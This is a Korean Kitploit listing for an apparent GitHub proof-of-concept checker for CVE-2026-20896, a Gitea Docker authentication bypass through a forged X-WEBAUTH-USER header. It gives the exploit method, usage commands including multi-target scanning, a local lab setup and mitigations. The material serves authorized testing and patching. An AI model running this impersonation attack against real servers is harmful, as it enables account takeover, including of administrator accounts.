Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
cve-2026-20896-gitea-poc — CVE-2026-20896 Gitea Docker X-WEBAUTH-USER 인증 우회 점검기 | Kitploit
도구/GitHubGitHub/szybnev/cve-2026-20896-gitea-poc
Authentication & AuthorizationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRed Teaming
GitHubszybnev/cve-2026-20896-gitea-poc

cve-2026-20896-gitea-poc

CVE-2026-20896 Gitea Docker X-WEBAUTH-USER 인증 우회 점검기

저장소 보기
101개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2026-20896 Gitea Docker 인증 우회 점검기

승인된 레드팀 / 모의 침투 작업 전용입니다.

이 저장소는 공식 Gitea Docker 이미지에서 리버스 프록시 인증이 활성화된 경우 1.26.2 이하 버전에 영향을 주는 인증 우회 취약점인 CVE-2026-20896을 위한 최소 점검기를 포함하고 있습니다.

CVE-2026-20896이란

영향을 받는 Gitea Docker 이미지에는 다음과 같은 app.ini 템플릿이 포함되어 있었습니다:

root@kitploit:~
REVERSE_PROXY_TRUSTED_PROXIES = *

관리자가 다음을 활성화하면:

root@kitploit:~
ENABLE_REVERSE_PROXY_AUTHENTICATION = true

Gitea는 컨테이너 HTTP 포트에 직접 도달할 수 있는 모든 소스 IP의 X-WEBAUTH-USER 값을 신뢰했습니다. 의도된 인증용 리버스 프록시를 우회한 클라이언트는 단일 헤더를 보내 알려졌거나 추측 가능한 사용자로 가장할 수 있었습니다.

실질적 영향은 인증 없이 계정을 가장할 수 있다는 점입니다. 추측한 사용자가 관리자인 경우 최악의 시나리오는 Gitea 인스턴스와 해당 저장소 전체를 애플리케이션 수준에서 장악당하는 것입니다. 호스트 RCE는 환경에 따라 달라지며 본 점검기는 이를 주장하지 않습니다.

패치 버전은 1.26.3부터 시작하며, 1.26.4 이상으로 업그레이드하는 것이 권장됩니다.

PoC 작동 방식

점검기는 다음을 수행합니다:

  1. 대상 홈 페이지를 가져옵니다.
  2. Powered by Gitea Version: 1.26.4와 같은 푸터 텍스트를 찾습니다.
  3. 파싱된 버전이 >= 1.26.3이면 기본적으로 테스트를 건너뜁니다.
  4. 제공된 각 사용자 이름에 대해 X-WEBAUTH-USER: <username> 헤더가 포함된 GET / 요청을 보냅니다.
  5. 반환된 페이지 제목이 해당 사용자의 로그인된 대시보드처럼 보이면 적중으로 보고합니다.

Go 버전은 여러 대상, 사용자 이름 파일, 동시성, 타임아웃, JSONL 출력, TLS --insecure, --dry-run, --force를 지원합니다.

빌드

root@kitploit:~
go build -o gitea-cve-2026-20896-check .

타사 Go 의존성은 필요하지 않습니다.

사용법

단일 대상:

root@kitploit:~
./gitea-cve-2026-20896-check \
  --url http://localhost:3000 \
  --users admin,gitea_admin,alice

여러 대상 및 사용자 이름:

root@kitploit:~
./gitea-cve-2026-20896-check \
  --targets targets.txt \
  --user-file users.txt \
  --concurrency 64 \
  --timeout 8s \
  --jsonl

드라이 런:

root@kitploit:~
./gitea-cve-2026-20896-check \
  --url http://localhost:3000 \
  --users admin,alice \
  --dry-run

Bash 대체 스크립트:

root@kitploit:~
./poc.sh --url http://localhost:3000 --users admin,alice

종료 코드

  • 0: 취약한 가장(impersonation)이 하나 이상 확인됨
  • 1: 취약한 가장이 확인되지 않음
  • 2: 사용법, 입력 또는 런타임 오류

로컬 재현 실습 환경

다음 실습 환경은 영향을 받는 로컬 Gitea 컨테이너를 시작하고 테스트 사용자를 생성합니다:

root@kitploit:~
docker run -d --name gitea-cve-2026-20896 \
  -p 127.0.0.1:3000:3000 \
  -e GITEA__service__ENABLE_REVERSE_PROXY_AUTHENTICATION=true \
  -e GITEA__security__INSTALL_LOCK=true \
  gitea/gitea:1.26.2

sleep 15

docker exec --user git gitea-cve-2026-20896 gitea admin user create \
  --username alice \
  --password 'longpasswordhere1234' \
  --email [email protected] \
  --must-change-password=false

./gitea-cve-2026-20896-check --url http://localhost:3000 --users bob,alice,admin

예상되는 취약 확인 결과:

root@kitploit:~
[VULNERABLE] http://localhost:3000 user=alice title="alice - Dashboard - Gitea: Git with a cup of tea"

정리:

root@kitploit:~
docker rm -f gitea-cve-2026-20896

완화 조치

  • Gitea를 1.26.3 이상으로 업그레이드하세요. 1.26.4 이상이 권장됩니다.
  • 백엔드 Gitea 컨테이너 HTTP 포트를 신뢰할 수 없는 네트워크에 직접 노출하지 마세요.
  • 신뢰되는 리버스 프록시를 명시적으로 구성하세요.
  • 네트워크 경로와 프록시 신뢰 경계를 파악하지 않은 상태에서는 리버스 프록시 인증을 비활성화 상태로 유지하세요.

참고 자료

  • Gitea 보안 권고: https://github.com/go-gitea/gitea/security/advisories/GHSA-f75j-4cw6-rmx4
  • Gitea 1.26.3 / 1.26.4 릴리스 노트: https://blog.gitea.com/release-of-1.26.3-and-1.26.4/
  • 수정 PR: https://github.com/go-gitea/gitea/pull/38151
  • CVE 레코드: https://www.cve.org/CVERecord?id=CVE-2026-20896
  • The Hacker News / Sysdig 텔레메트리를 통한 실제 환경(in-the-wild) 탐사 보고: https://thehackernews.com/2026/07/threat-actors-probe-gitea-docker-flaw.html
도구 다운로드